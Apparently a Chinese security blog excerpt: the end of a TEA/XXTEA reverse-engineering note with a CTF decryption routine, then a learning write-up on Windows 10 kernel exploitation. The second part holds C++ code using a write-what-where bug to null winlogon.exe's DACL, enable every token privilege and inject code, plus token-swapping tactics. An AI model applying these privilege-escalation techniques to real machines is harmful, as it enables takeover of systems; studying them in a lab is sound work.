存在先进行位移，然后异或的类似操作（(z>>5^y<<2)这类混合变换）
前面一个复杂的混合变换的结果可能会叠加到另一个值上，两者相互叠加（Feistel 结构）
获取密钥的时候，会使用某一个常量值作为下标（key[(sum>>11) & 3]）
会在算法开始定义一个delta，并且这个值不断的参与算法，但是从来不会受到输入的影响（delta数值，根据见过的题目中很少会直接使用0x9e3779b9）

解决逆向题大部分出现TEA的场合都是【识别算法->编写对应解密程序】，将上述的算法进行逆推即可得到解密。

实战：xnuca2020 babyarm

这个题目里面的TEA是出题人魔改过的:

if ( (signed int)v34 <= 15 )
    {
      v9 = v4[15];
      v28 = v4[1];
      v10 = v4[6];
      v32 = *v4;
      v11 = v4[9];
      v25 = v4[2];
      v12 = v4[10];
      v29 = v4[3];
      v13 = v4[11];
      v26 = v4[4];
      v14 = v4[12];
      v27 = v4[5];
      v15 = v4[13];
      v30 = v4[7];
      v16 = v4[14];
      v33 = v4[15];
      v31 = v4[8];
      do
      {
        sum = 0;
        do
        {
          sum -= 0x61C88647;
          v32 += (((v28 >> 3) ^ 16 * v9) + (4 * v28 ^ (v9 >> 5))) ^ ((v9 ^ *(int *)((char *)&v40 + (sum & 0xC) - 0x14))// ((char *)&v41 + (v17 & 0xC) - 0x14)这种写法表示:（包括写成-20->0x14）+ (v28 ^ sum));
          v28 += ((*(&v40 + (((unsigned __int8)(sum >> 2) ^ 1) & 3) - 5) ^ v32) + (v25 ^ sum)) ^ (((v25 >> 3) ^ 16 * v32)
                                                                                                + (4 * v25 ^ (v32 >> 5)));
          v25 += ((*(&v40 + (((unsigned __int8)(sum >> 2) ^ 2) & 3) - 5) ^ v28) + (v29 ^ sum)) ^ (((v29 >> 3) ^ 16 * v28)
                                                                                                + (4 * v29 ^ (v28 >> 5)));
          v29 += ((*(&v40 + (((unsigned __int8)(sum >> 2) ^ 3) & 3) - 5) ^ v25) + (v26 ^ sum)) ^ (((v26 >> 3) ^ 16 * v25)
                                                                                                + (4 * v26 ^ (v25 >> 5)));
          v26 += ((*(&v40 + ((sum >> 2) & 3) - 5) ^ v29) + (v27 ^ sum)) ^ (((v27 >> 3) ^ 16 * v29)// 没有异或
                                                                         + (4 * v27 ^ (v29 >> 5)));
          v27 += ((*(&v40 + (((unsigned __int8)(sum >> 2) ^ 5) & 3) - 5) ^ v26) + (v10 ^ sum)) ^ (((v10 >> 3) ^ 16 * v26)
                                                                                                + (4 * v10 ^ (v26 >> 5)));
          v10 += ((*(&v40 + (((unsigned __int8)(sum >> 2) ^ 6) & 3) - 5) ^ v27) + (v30 ^ sum)) ^ (((v30 >> 3) ^ 16 * v27)
                                                                                                + (4 * v30 ^ (v27 >> 5)));
          v30 += ((*(&v40 + (((unsigned __int8)(sum >> 2) ^ 7) & 3) - 5) ^ v10) + (v31 ^ sum)) ^ (((v31 >> 3) ^ 16 * v10)
                                                                                                + (4 * v31 ^ (v10 >> 5)));
          v18 = v31
              + (((*(&v40 + ((sum >> 2) & 3) - 5) ^ v30) + (v11 ^ sum)) ^ (((v11 >> 3) ^ 16 * v30)// 没有异或
                                                                         + (4 * v11 ^ (v30 >> 5))));
          v11 += ((*(&v40 + (((unsigned __int8)(sum >> 2) ^ 9) & 3) - 5) ^ v18) + (v12 ^ sum)) ^ (((v12 >> 3) ^ 16 * v18)
                                                                                                + (4 * v12 ^ (v18 >> 5)));
          v31 = v18;
          LOBYTE(v18) = sum >> 2;
          v12 += ((*(&v40 + (((unsigned __int8)v18 ^ 0xA) & 3) - 5) ^ v11) + (v13 ^ sum)) ^ (((v13 >> 3) ^ 16 * v11)
                                                                                           + (4 * v13 ^ (v11 >> 5)));
          v13 += ((*(&v40 + (((unsigned __int8)v18 ^ 0xB) & 3) - 5) ^ v12) + (v14 ^ sum)) ^ (((v14 >> 3) ^ 16 * v12)
                                                                                           + (4 * v14 ^ (v12 >> 5)));
          v14 += ((*(&v40 + ((sum >> 2) & 3) - 5) ^ v13) + (v15 ^ sum)) ^ (((v15 >> 3) ^ 16 * v13)// 没有异或
                                                                         + (4 * v15 ^ (v13 >> 5)));
          v15 += (((v16 >> 3) ^ 16 * v14) + (4 * v16 ^ (v14 >> 5))) ^ ((*(&v40 + (((unsigned __int8)v18 ^ 0xD) & 3) - 5) ^ v14)
                                                                     + (v16 ^ sum));
          v16 += (((v33 >> 3) ^ 16 * v15) + (4 * v33 ^ (v15 >> 5))) ^ ((*(&v40 + (((unsigned __int8)v18 ^ 0xE) & 3) - 5) ^ v15)
                                                                     + (v33 ^ sum));
          v19 = (((v32 >> 3) ^ 16 * v16) + (4 * v32 ^ (v16 >> 5))) ^ ((*(&v40 + (((unsigned __int8)v18 ^ 0xF) & 3) - 5) ^ v16)
                                                                    + (v32 ^ sum));
          *v4 = v32;
          v4[1] = v28;
          v4[2] = v25;
          v4[3] = v29;
          v4[4] = v26;
          v4[5] = v27;
          v9 = v19 + v33;
          v4[7] = v30;
          v4[6] = v10;
          v4[8] = v31;
          v4[9] = v11;
          v4[10] = v12;
          v4[11] = v13;
          v4[12] = v14;
          v4[13] = v15;
          v4[14] = v16;
          v4[15] = v19 + v33;
          v33 += v19;
        }
        while ( sum != 0x8FF34781 );
        ++v34;
      }
      while ( v34 != (char *)16 );

上述加密

而且玩了一个小花招：这段逻辑并不会一开始就出现在main函数中，而是在执行的时候，从.init_array取出的函数会将main函数的后方逻辑修改成这个函数的入口。整体逻辑比较偏长，不过可以辨认应该是魔改的XXTEA，并且每16个字节为一组进行的加密。这个题有几个小坑

sum是减法而不是TEA算法中常见的加法运算
这几个加密算法中的4，8，12，16个字节的算法不同于其他的加密算法

不过识别出这些坑之后，由于我们知道TEA算法实际上是满足Feistel 结构的算法。这一类算法在已知key的情况下，必定是可以反推的。通过观察我们可以知道，v4[15]正好是最新的一个状态，所以可以从这个状态往回进行推理。题目中的key就藏在了文件中，于是最终解密代码我们可以写成:

uint32_t DeryptoLoop(unsigned int num1, unsigned int num2, uint32_t sum, uint32_t index)
{
unsigned int key[4] = { 2,2,3,4 };
//unsigned int key[4] = { 4,3,2,2 };
uint32_t tmp1 = ((num1 >> 3) ^ 16 * num2) + (4 * num1 ^ (num2 >> 5));
uint32_t tmp2 = (key[((sum >> 2) ^ index) & 3] ^ num2) + (num1 ^ sum);
return tmp1 ^ tmp2;

}

uint32_t DeryptoLoop2(unsigned int num1, unsigned int num2, uint32_t sum, uint32_t index)
{
unsigned int key[4] = { 2,2,3,4 };
//unsigned int key[4] = { 4,3,2,2 };
uint32_t tmp1 = ((num1 >> 3) ^ 16 * num2) + (4 * num1 ^ (num2 >> 5));
uint32_t tmp2 = (key[((sum >> 2)) & 3] ^ num2) + (num1 ^ sum);
return tmp1 ^ tmp2;

}

void decrypt2(unsigned dec_2[16])
{
unsigned int state[16];
unsigned int DELTA = 0x8FF34781;
unsigned int key[4] = { 2,2,3,4 };
int round = 0;
for (int i = 0; i < 16; i++)
{
state[i] = enc_2[i];
}
do {
int tmpd = DELTA;
do {
state[15] -= DeryptoLoop(state[0], state[14], tmpd, 15);
state[14] -= DeryptoLoop(state[15], state[13], tmpd, 14);
state[13] -= DeryptoLoop(state[14], state[12], tmpd, 13);
state[12] -= DeryptoLoop2(state[13], state[11], tmpd, 12);
state[11] -= DeryptoLoop(state[12], state[10], tmpd, 11);
state[10] -= DeryptoLoop(state[11], state[9], tmpd, 10);
state[9] -= DeryptoLoop(state[10], state[8], tmpd, 9);
state[8] -= DeryptoLoop2(state[9], state[7], tmpd, 8);
state[7] -= DeryptoLoop(state[8], state[6], tmpd, 7);
state[6] -= DeryptoLoop(state[7], state[5], tmpd, 6);
state[5] -= DeryptoLoop(state[6], state[4], tmpd, 5);
state[4] -= DeryptoLoop2(state[5], state[3], tmpd, 4);
state[3] -= DeryptoLoop(state[4], state[2], tmpd, 3);
state[2] -= DeryptoLoop(state[3], state[1], tmpd, 2);
state[1] -= DeryptoLoop(state[2], state[0], tmpd, 1);
state[0] -= DeryptoLoop2(state[1], state[15], tmpd, 0);
tmpd += 0x61C88647;
} while (tmpd != 0);
round += 1;
} while (round < 16);
for (int i = 0; i < 16; i++)
{
dec_2[i] = state[i];
}
}

总结

最初只是想作为一个笔记记录一下学习过程，然而后来发现TEA的演进过程十分有趣，不能知其然而不知其所以然，为啥TEA算法最后会被淘汰呢？我觉得了解这些事情能够帮助我们更加深入的去理解这个算法，也能帮助我们更好的去回顾过去发生过的那些黑客故事。有机会的话应该会把那个Xbox破解的事情给翻译一下~

参考链接

Wiki TEA
Wiki XTEA
Wiki XXTEA
Wiki-Tiny_Encryption_Algorithm
Xbox_Security_System_With_TEA_Hash

WindowsKernelExploit2.5

2020-10-17T10:35:11.000Z

上篇我们只是简单介绍了一下在Windows Kernel中的 WWW 类型的漏洞应该怎么利用。这一篇将会比较详细的讲解一下常见的理用方式以及相关调试技巧。（可能会借助上一篇中存在的漏洞）
本篇转自安全客 https://www.anquanke.com/post/id/218681

Windows Kernel Exploit中的那些事儿

当谈到Kernel Exploit的时候，我们希望做到什么？

其实很多的漏洞利用，最终都是为了转换成这个漏洞——任意位置读写。所以我们首先要有一个概念就是，当我们获得了一个WWW类型的漏洞的时候，我们需要做什么。这里我们借助这一篇文章一起来学习一下

如果获得了WWW(Write-What-Where)

当我们通过IOCTL等各种方式与内核模块发生了交互的时候，我们实际上就拥有了从usermode向kernelmode发起交互的能力，这个时候其实就类似在用户态能够进行交互。所以当我们能够拥有一个WWW漏洞的时候，实际上我们希望做到的事情是

能够将一个由我们控制的进程权限，提升到我们想要让它达到的权限上去

非常重要的一点是，我们需要明白此时的我们需要的目的是什么。也就是说

并不是单纯追求system shell，而是在保证系统稳定的前提下，获得我们想要的权限

这点很重要。前几次的攻击练习中，我单纯的以为kernel exploit就是将某个进程的PROCESS TOKEN复制到当前进程。如果需要做到这一步的话，那么实际上意味着我们此时的攻击需要能够执行shellcode。类比一下的话，就好像在玩linux pwn题，然后此时我们非要获得一个函数指针，或者是关闭了NX的栈溢出，然后等待着jmp esp之类奇怪指令的出现。

但是！如果我们只是为了获得想要的权限的话，不如从源头出发，也就是考虑Windows下的各种权限都是怎么得到的呢？。进一步来说，为什么winlogon.exe这个程序的权限这么高，而我们自己启动的cmd.exe能做到的事情那么少，但是为什么windbg.exe却好像能够跨过某些障碍进行调试呢？其实这就是之前博客中提到过的Windows权限管理实现的。简单来说，就是以下两个特性:

Access Right: 访问控制
Privilege: 特权

这两个特性控制了Windows下的权限，而当我们想要进行越权操作的时候，实际上我们就是企图控制一个进程的权限控制模块。于是，当获得了一个WWW类型漏洞，我们实际上应该是尝试修改当前进程的权限管理对象，说白了，也就是一些存放在内核中的系统变量。

从 NtQuerySystemInformation 开始的故事

Windows的NtQuery*API系列其实能做的事情比他文档中写出来的多得多，其中最厉害的就是这个NtQuerySystemInformation，这个API能够返回一些系统级别的内存对象，例如:

当前系统进程/线程信息
当前页文件使用状况/缓存使用情况
系统的一些中断信息

简直就像是一个后门函数了（笑）
这里我们关注一个叫做SystemHandleInformation类型的数据，通过传入这个参数，我们能够获得当前进程中的每一个句柄的使用情况:

1	NtQuerySystemInformation((SYSTEM_INFORMATION_CLASS)SystemHandleInformation, buffer, 0x20, &outBuffer);

其中句柄的结构长这个样子:

typedef struct _SYSTEM_HANDLE_INFORMATION
{
ULONG NumberOfHandles;
SYSTEM_HANDLE Handels[1];
} SYSTEM_HANDLE_INFORMATION, *PSYSTEM_HANDLE_INFORMATION;

这个地方记录了当前进程中，所有会使用到的句柄。注意是所有，换句话说，有些句柄可能并不是当前进程打开的，也会记录在这边（之后会举例）。句柄的结构体如下:

typedef struct _SYSTEM_HANDLE_TABLE_ENTRY_INFO
{
ULONG ProcessId;                // 当前句柄属于的进程
UCHAR ObjectTypeNumber;         // 当前句柄的类型
UCHAR Flags;
USHORT Handle;                  // 当前句柄的句柄号
void* Object;                   // 当前句柄实际对象的地址
ACCESS_MASK GrantedAccess;
} SYSTEM_HANDLE, *PSYSTEM_HANDLE;

之前的博客中有提到过，Windows大部分时候都是直接使用句柄这个概念与上层进行交互的，不过通过这个结构体，我们就能够直接拿到句柄真正对应的对象，然后对句柄对应的内容进行修改。

插曲：ObjectTypeNumber的对应关系

上述可以看到，那个ObjectTypeNumber其实表示的是当前句柄的类型，不过我上网查到的很多资料都有问题，所以这里我们自己整理一份对应关系。首先这边的大佬帮忙整理了在Win10中，不同的Object在内存中的组织形式发生了什么样的变化，简单来说，在早期的windows系统中，通过查看_OBJECT_HEADER是能够知道当前的对象类型的，但是win10修改了，其计算放在这个函数上:

1: kd> uf nt!ObGetObjectType
nt!ObGetObjectType:
81e13e44 8bff            mov     edi,edi
81e13e46 55              push    ebp
81e13e47 8bec            mov     ebp,esp
81e13e49 8b4d08          mov     ecx,dword ptr [ebp+8]
81e13e4c 8d41e8          lea     eax,[ecx-18h]
81e13e4f 0fb649f4        movzx   ecx,byte ptr [ecx-0Ch]
81e13e53 c1e808          shr     eax,8
81e13e56 0fb6c0          movzx   eax,al
81e13e59 33c1            xor     eax,ecx
81e13e5b 0fb60dd824d081  movzx   ecx,byte ptr [nt!ObHeaderCookie (81d024d8)]
81e13e62 33c1            xor     eax,ecx
81e13e64 8b0485e024d081  mov     eax,dword ptr nt!ObTypeIndexTable (81d024e0)[eax*4]
81e13e6b 5d              pop     ebp
81e13e6c c20400          ret     4

稍微逆向一下就知道，现在想要通过_OBJECT_HEADER知道当前对象的类型，就得用这个算式:

1	nt!ObTypeIndexTable[(当前objectheader的地址的第二个字节^TypeIndex^poi(nt!ObHeaderCookie)最低字节)*4]

这里举个例子。比如我们想要知道的TOKEN这个对象的objectheader长这样:

1: kd> dt _Object_header 8bfd1888
nt!_OBJECT_HEADER
   +0x000 PointerCount     : 0n33
   +0x004 HandleCount      : 0n2
   +0x004 NextToFree       : 0x00000002 Void
   +0x008 Lock             : _EX_PUSH_LOCK
   +0x00c TypeIndex        : 0x8e ''
   +0x00d TraceFlags       : 0 ''
   +0x00d DbgRefTrace      : 0y0
   +0x00d DbgTracePermanent : 0y0
   +0x00e InfoMask         : 0x8 ''
   +0x00f Flags            : 0x2 ''
   +0x00f NewObject        : 0y0
   +0x00f KernelObject     : 0y1
   +0x00f KernelOnlyAccess : 0y0
   +0x00f ExclusiveObject  : 0y0
   +0x00f PermanentObject  : 0y0
   +0x00f DefaultSecurityQuota : 0y0
   +0x00f SingleHandleEntry : 0y0
   +0x00f DeletedInline    : 0y0
   +0x010 ObjectCreateInfo : 0x8d2952c0 _OBJECT_CREATE_INFORMATION
   +0x010 QuotaBlockCharged : 0x8d2952c0 Void
   +0x014 SecurityDescriptor : 0xa7a779d2 Void
   +0x018 Body             : _QUAD

那么我们此时计算的值就是:

1 2	1: kd> ? (0x18^0x8e^0x93) Evaluate expression: 5 = 00000005

最终我们检查内存中的形式:

1: kd> dt nt!_object_type poi(nt!ObTypeIndexTable + (0x5*4))
   +0x000 TypeList         : _LIST_ENTRY [ 0x8639bbd0 - 0x8639bbd0 ]
   +0x008 Name             : _UNICODE_STRING "Token"
   +0x010 DefaultObject    : 0x81cb60f0 Void
   +0x014 Index            : 0x5 ''
   +0x018 TotalNumberOfObjects : 0x9f0
   +0x01c TotalNumberOfHandles : 0x396
   +0x020 HighWaterNumberOfObjects : 0xa59
   +0x024 HighWaterNumberOfHandles : 0x3d6
   +0x028 TypeInfo         : _OBJECT_TYPE_INITIALIZER
   +0x080 TypeLock         : _EX_PUSH_LOCK
   +0x084 Key              : 0x656b6f54
   +0x088 CallbackList     : _LIST_ENTRY [ 0x8639bc58 - 0x8639bc58 ]

这个object确实是token，证明了我们的猜测。
并且我们可以看到，这个计算的结果5其实正好就是ObjectTypeNumber，所以我也整理了一遍这个ObjectTypeNumber，这次只用在win10上

typedef enum _SYSTEM_HANDLE_TYPE
{
    OB_TYPE_TYPE = 2,
    Directory = 3,
    SymbolicLink,
    Token,
    Job,
    Process,
    Thread,
    Partition,
    UserApcReserve,
    IoCompletionReserve,
    ActivityReference,
    PsSiloContextPaged,
    PsSiloContextNonPaged,
    DebugObject,
    Event,
    Mutant,
    Callback,
    Semaphore,
    Timer,
    IRTimer,
    Profile,
    KeyedEvent,
    WindowStation,
    Desktop,
    Composition,
    RawInputManager,
    CoreMessaging,
    ActivationObject,
    TpWorkerFactory,
    Adapter,
    Controller,
    Device,
    Driver,
    IoCompletion,
    WaitCompletionPacket,
    File,
    TmTm
}

后面还有好多。。。等用到时候再列出来吧。。。

需要修改哪些地方呢

我们之前提到说，想要提权，可以从如下两个角度去入手:

Access Right: 访问控制
Privilege: 特权

那假设我们可以控制一些变量来修改这个值（而不是通过控制kernel code的执行），我们可以从如下的角度去考虑

我们是否可以移除一个windows object的所有ACLs？
我们是否可以给一个进程token任意的特权？
我们是否可以替换掉一个进程的token？

其中第一条是针对Access Right的攻击手段，第二三条则是Privilege的相关攻击手段。那么我们一条条来分析可行性

方法一：ACLs的修改

Windows底下有一条很有趣的规矩:

如果一个对象的ACLs是空的，那么这个对象将被视为可以被任意权限的任意对象进行任意访问。而如果ACLs被初始化为空（empty），那么将视为当前对象没有被赋予任何的被访问的权限，所以不能被任何对象以任何权限访问

总的来说，区别就体现在结构体的这个地方:

1: kd> dt _Object_header 8bfd1888
nt!_OBJECT_HEADER
   +0x000 PointerCount     : 0n33
   +0x004 HandleCount      : 0n2
   +0x004 NextToFree       : 0x00000002 Void
   +0x008 Lock             : _EX_PUSH_LOCK
   +0x00c TypeIndex        : 0x8e ''
   +0x00d TraceFlags       : 0 ''
   +0x00d DbgRefTrace      : 0y0
   +0x00d DbgTracePermanent : 0y0
   +0x00e InfoMask         : 0x8 ''
   +0x00f Flags            : 0x2 ''
   +0x00f NewObject        : 0y0
   +0x00f KernelObject     : 0y1
   +0x00f KernelOnlyAccess : 0y0
   +0x00f ExclusiveObject  : 0y0
   +0x00f PermanentObject  : 0y0
   +0x00f DefaultSecurityQuota : 0y0
   +0x00f SingleHandleEntry : 0y0
   +0x00f DeletedInline    : 0y0
   +0x010 ObjectCreateInfo : 0x8d2952c0 _OBJECT_CREATE_INFORMATION
   +0x010 QuotaBlockCharged : 0x8d2952c0 Void
   +0x014 SecurityDescriptor : 0xa7a779d2 Void
   +0x018 Body             : _QUAD

SecurityDescriptor这个对象当指向的内容为空的时候，就是我们提到的第一种情况，也就是当前对象变成可以被任意对象访问。

实践：利用WWW漏洞修改winlogon.exe进程对象的访问控制权限

我们知道，winlogon.exe这个进程的权限特别的高，那我们能不能通过找到这个进程的EPROCESS对应的object_header，将其中的DACL给改成空的，就能够实下代码注入了呢？我们这边稍微实验一下:

// first, we should open target process on our processPROCESSENTRY32 entry;
DWORD dwPid = GetProcessID(L"winlogon.exe");
printf("the winlogon.exe pid is 0x%x\n", dwPid);
// then, we try to open a handle
HANDLE hTarget = OpenProcess(PROCESS_QUERY_LIMITED_INFORMATION, FALSE, dwPid);
if (!hTarget) {
std::cout << "Open winlogon.exe failed" << std::endl;
return false;
}
// next, we try to open this eprocess address at kernel
DWORD dwEPROCESS = GetKernelPointer(hTarget, 0x7);
DWORD dwObjectHeader = dwEPROCESS - 0x18;
printf("[+] winlogon.exe eprocess addr [0x%x], the object addr [0x%x] and the dacl addr [0x%x]\n", dwEPROCESS, dwObjectHeader, dwObjectHeader + 0x14);

// here we try to change the dacl to another one
WrtieWhatWhere *WWW = (WrtieWhatWhere*)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, sizeof(WrtieWhatWhere));
DWORD dwTargetOffset = dwEPROCESS - 0x4;
DWORD dwRetSize = 0;
WWW->Where = (ULONG_PTR)dwTargetOffset;
//std::cout << "Base address:" << dwBaseAddress << " ExOffset:" << ulExAllocatePool;
UINT64 uAllPrivelage = 0;
WWW->What = (ULONG_PTR)&uAllPrivelage;
// WWW->What = (ULONG)&dwRealExAllocatePool;
// copy exp to target address
std::cout << "Now we will write[" << WWW->Where << "]:" << *(ULONG*)(WWW->What) << std::endl;
// Call the WWW vulnerability to write the target address
    Vunelrable(WWW);
// now because the dacl has been changed, we guess this process may could be inject
// Tro to inject code
InjectToWinlogon();
HeapFree(GetProcessHeap(), 0, WWW);
return true;

结果如下:

KDTARGET: Refreshing KD connection

*** Fatal System Error: 0x00000189
                       (0x8D1D9028,0x8639B480,0x00000001,0x00000000)

Break instruction exception - code 80000003 (first chance)

A fatal system error has occurred.
Debugger entered on first try; Bugcheck callbacks have not been invoked.

A fatal system error has occurred.

For analysis of this file, run !analyze -v
nt!RtlpBreakWithStatusInstruction:
81b66484 cc              int     3
1: kd> !analyze -v
*******************************************************************************
*                                                                             *
*                        Bugcheck Analysis                                    *
*                                                                             *
*******************************************************************************

BAD_OBJECT_HEADER (189)
The OBJECT_HEADER has been corrupted
Arguments:
Arg1: 8d1d9028, Pointer to bad OBJECT_HEADER
Arg2: 8639b480, Pointer to the resulting OBJECT_TYPE based on the TypeIndex in the OBJECT_HEADER
Arg3: 00000001, The object security descriptor is invalid.
Arg4: 00000000, Reserved.

Debugging Details:
------------------

非常遗憾，没有生效，上网检查了一下，发现其实是Win10给出的一种攻击的缓解手段。在Win10上，EPROCESS这个对象的_OBJECT_HEADER中指向DS的指针是不能为空的，否则就会报错，具体可以看这里。这篇文章还介绍了一下如何绕过这个防护，继续利用dacl进行攻击。利用的思路就是修改成了：通过修改winlogon.exe中的AECs，让其进程允许来自任意SID token 的用户修改，然后再进行inject即可。具体可参考链接里面给出的方法，这边暂时就不演示（虚拟机崩的太多了，心态崩溃）

方法二：TOKEN结构体

前面介绍了ACL的攻击方式，那么这次我们回到TOKEN上面，介绍一下修改token的攻击。之前我们提到说，想要提权，其实就是修改这个TOKEN结构体的成员变量。这个结构体在WIN10中结构如下:

1: kd> dt nt!_TOKEN
   +0x000 TokenSource      : _TOKEN_SOURCE
   +0x010 TokenId          : _LUID
   +0x018 AuthenticationId : _LUID
   +0x020 ParentTokenId    : _LUID
   +0x028 ExpirationTime   : _LARGE_INTEGER
   +0x030 TokenLock        : Ptr32 _ERESOURCE
   +0x034 ModifiedId       : _LUID
   +0x040 Privileges       : _SEP_TOKEN_PRIVILEGES
   +0x058 AuditPolicy      : _SEP_AUDIT_POLICY
   +0x078 SessionId        : Uint4B
   +0x07c UserAndGroupCount : Uint4B
   +0x080 RestrictedSidCount : Uint4B
   +0x084 VariableLength   : Uint4B
   +0x088 DynamicCharged   : Uint4B
   +0x08c DynamicAvailable : Uint4B
   +0x090 DefaultOwnerIndex : Uint4B
   +0x094 UserAndGroups    : Ptr32 _SID_AND_ATTRIBUTES
   +0x098 RestrictedSids   : Ptr32 _SID_AND_ATTRIBUTES
   +0x09c PrimaryGroup     : Ptr32 Void
   +0x0a0 DynamicPart      : Ptr32 Uint4B
   +0x0a4 DefaultDacl      : Ptr32 _ACL
   +0x0a8 TokenType        : _TOKEN_TYPE
   +0x0ac ImpersonationLevel : _SECURITY_IMPERSONATION_LEVEL
   +0x0b0 TokenFlags       : Uint4B
   +0x0b4 TokenInUse       : UChar
   +0x0b8 IntegrityLevelIndex : Uint4B
   +0x0bc MandatoryPolicy  : Uint4B
   +0x0c0 LogonSession     : Ptr32 _SEP_LOGON_SESSION_REFERENCES
   +0x0c4 OriginatingLogonSession : _LUID
   +0x0cc SidHash          : _SID_AND_ATTRIBUTES_HASH
   +0x154 RestrictedSidHash : _SID_AND_ATTRIBUTES_HASH
   +0x1dc pSecurityAttributes : Ptr32 _AUTHZBASEP_SECURITY_ATTRIBUTES_INFORMATION
   +0x1e0 Package          : Ptr32 Void
   +0x1e4 Capabilities     : Ptr32 _SID_AND_ATTRIBUTES
   +0x1e8 CapabilityCount  : Uint4B
   +0x1ec CapabilitiesHash : _SID_AND_ATTRIBUTES_HASH
   +0x274 LowboxNumberEntry : Ptr32 _SEP_LOWBOX_NUMBER_ENTRY
   +0x278 LowboxHandlesEntry : Ptr32 _SEP_CACHED_HANDLES_ENTRY
   +0x27c pClaimAttributes : Ptr32 _AUTHZBASEP_CLAIM_ATTRIBUTES_COLLECTION
   +0x280 TrustLevelSid    : Ptr32 Void
   +0x284 TrustLinkedToken : Ptr32 _TOKEN
   +0x288 IntegrityLevelSidValue : Ptr32 Void
   +0x28c TokenSidValues   : Ptr32 _SEP_SID_VALUES_BLOCK
   +0x290 IndexEntry       : Ptr32 _SEP_LUID_TO_INDEX_MAP_ENTRY
   +0x294 DiagnosticInfo   : Ptr32 _SEP_TOKEN_DIAG_TRACK_ENTRY
   +0x298 BnoIsolationHandlesEntry : Ptr32 _SEP_CACHED_HANDLES_ENTRY
   +0x29c SessionObject    : Ptr32 Void
   +0x2a0 VariablePart     : Uint4B

这其中最关键的就是

1	+0x040 Privileges : _SEP_TOKEN_PRIVILEGES

这个位置记录了当前进程的特权。特权的结构如下:

nt!_SEP_TOKEN_PRIVILEGES
   +0x000 Present          : Uint8B
   +0x008 Enabled          : Uint8B
   +0x010 EnabledByDefault : Uint8B

之前提到过，Windows再运行过程中，实际上是检查了Enabled这个位置的特权。换句话说，如果这个位置的特权都打开了，那么当前进程将会获得所有类型的特权。具体的exp可以参考上一篇博客，这里给出一个大概的例子:

// New Method
HANDLE hCurrentProcess = OpenProcess(PROCESS_QUERY_INFORMATION, FALSE, GetCurrentProcessId());
if (!hCurrentProcess) {
std::cout << "[-] Open Current process faiiled" << std::endl;
return;
}

HANDLE hToken = 0;
// the TOKEN_ADJUST_PRIVILEGES will enable/disable the privelage token
if (!OpenProcessToken(hCurrentProcess, TOKEN_ADJUST_PRIVILEGES, &hToken)) {
std::cout << "[-] Couldn't get curr ent process token" << std::endl;
return;
}
// The 0x5 is what??????
DWORD kToken = GetKernelPointer(hToken, 0x5);
DWORD dwTargetOffset = kToken + 0x48;

std::cout << "The target token offest is " << dwTargetOffset << std::endl;
WrtieWhatWhere *WWW = (WrtieWhatWhere*)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, sizeof(WrtieWhatWhere));
WWW->Where = (ULONG_PTR)dwTargetOffset;
//std::cout << "Base address:" << dwBaseAddress << " ExOffset:" << ulExAllocatePool;
UINT64 uAllPrivelage= 0xffffffffffffffff;
WWW->What = (ULONG_PTR)&uAllPrivelage;
   // Call the WWW vulnerability to write the target address
   Vunelrable(WWW);
// now because the dacl has been changed, we guess this process may could be inject
// Tro to inject code
InjectToWinlogon();

方法三：替换TOKEN

这个方法其实之前也用过，就是比较简单的替换到EPROCESS中的这个地方:

0: kd> dt nt!_EPROCESS
//....
   +0x0d8 ProcessQuotaUsage : [2] Uint4B
   +0x0e0 ProcessQuotaPeak : [2] Uint4B
   +0x0e8 PeakVirtualSize  : Uint4B
   +0x0ec VirtualSize      : Uint4B
   +0x0f0 SessionProcessLinks : _LIST_ENTRY
   +0x0f8 ExceptionPortData : Ptr32 Void
   +0x0f8 ExceptionPortValue : Uint4B
   +0x0f8 ExceptionPortState : Pos 0, 3 Bits
   +0x0fc Token            : _EX_FAST_REF <------------修改这里

不过修改这个地方的话，之前的做法比较无脑，一般就是:

找到一个超高权限的进程，例如system
将其token复制过来，覆盖当前进程的token

这个做法其实有点问题。我们看到token这个玩意儿的结构体:

typedef struct _EX_FAST_REF
{
     union
     {
          PVOID Object;
          ULONG RefCnt: 3;
          ULONG Value;
     };
} EX_FAST_REF, *PEX_FAST_REF;

可以看到，它虽然是一个指针，但是低3bit是用来表示当前对象的引用次数的。换句话说，如果我们真的拷贝了某一个token的话，其实还需要将当前token 的refCnt数量给修改了，不然当被我们拷贝的那个进程结束的时候，token本身也就会被销毁，从而导致BSoD。不过，我们可以看到之前提到的那个_OBJECT_HEADER，当我们修改这个结构体中的PointerCount的时候，系统就会认为当前对象的引用计数+1，从而放指bsod。

1: kd> dt _Object_header 8bfd1888
nt!_OBJECT_HEADER
   +0x000 PointerCount     : 0n33
   +0x004 HandleCount      : 0n2

参考的文章中提供了一种比较常见的利用思路

通过hook NtOpenThreadToken()，然后调用MsiInstallProduct()API（需要中级的权限）来截获SystemToken
当我们有多次写的能力的时候，我们需要首先将TOKEN-0x18(也就是PointerCount)数量+1，之后再修改当前进程token为这个token
如果只有单次写能力的时候，首先选择一个不太可能结束的进程（例如system），修改完当前进程的token之后，马上从这个不太可能结束的进程中复制两个token的句柄。

关于Windbg

调试是帮助理解的一个重要的过程。这里记录一些有用的能够帮助分析的一些调试技巧

内核调试进程

调试内核的时候，首先最想要知道的就是进程相关的信息，使用

1	kd>!process 0 0

来枚举当前内核中所有的进程，或者使用

1	kd>!process 0 0 ImageName

来指定加载了ImageName的进程。（不过和上面那个指令执行的速度基本一样快）
执行之后，就会打印如下的内容:

1: kd> !process 0 0 Exploit.exe
PROCESS aed07600  SessionId: 1  Cid: 1b90    Peb: 00451000  ParentCid: 0d24
    DirBase: 3ffd35c0  ObjectTable: af3f4540  HandleCount:  38.
    Image: Exploit.exe

这里稍微解释一下其中几个常见值的意义：

PROCESS后面指出的就是当前进程的EPROCESS的地址
SessionId表示的是当前枚举进程所属的会话
Cid表示CLIENT_ID，这里本质上就是PID
PEB表示当前PEB的地址。。。
ParentCid表示父进程PID

其他值暂时还没搞懂是啥意思

切换进程

直接上网查的话，很容易查到说kernel层切换进程的指令为:

1	kd>.process /r /p EPROCESS

然而这个指令本质上只是表示将当前进程中的所有的分页表映射对应的物理地址中，这个操作其实对于live debug帮助实际上并没有那么大，只能说对于full dump之类的场合，能够更加方便的分析进程信息。如果在live debug中，可以使用

1	kd>.process /i EPROCESS

使用完之后，windbg会提示使用g指令运行一阵子，当再次发生中断的时候，此时整个windbg就会切换到我们指定的进程空间中。这个时候使用形如!token之类的指令，就能够直接查询指定进程的基本信息了。

检查Object header

Windows中万物皆object，所以基本上可以认为每一个你能看到的结构中，都会有一个object header，而且大小似乎是固定的0x18(x86)

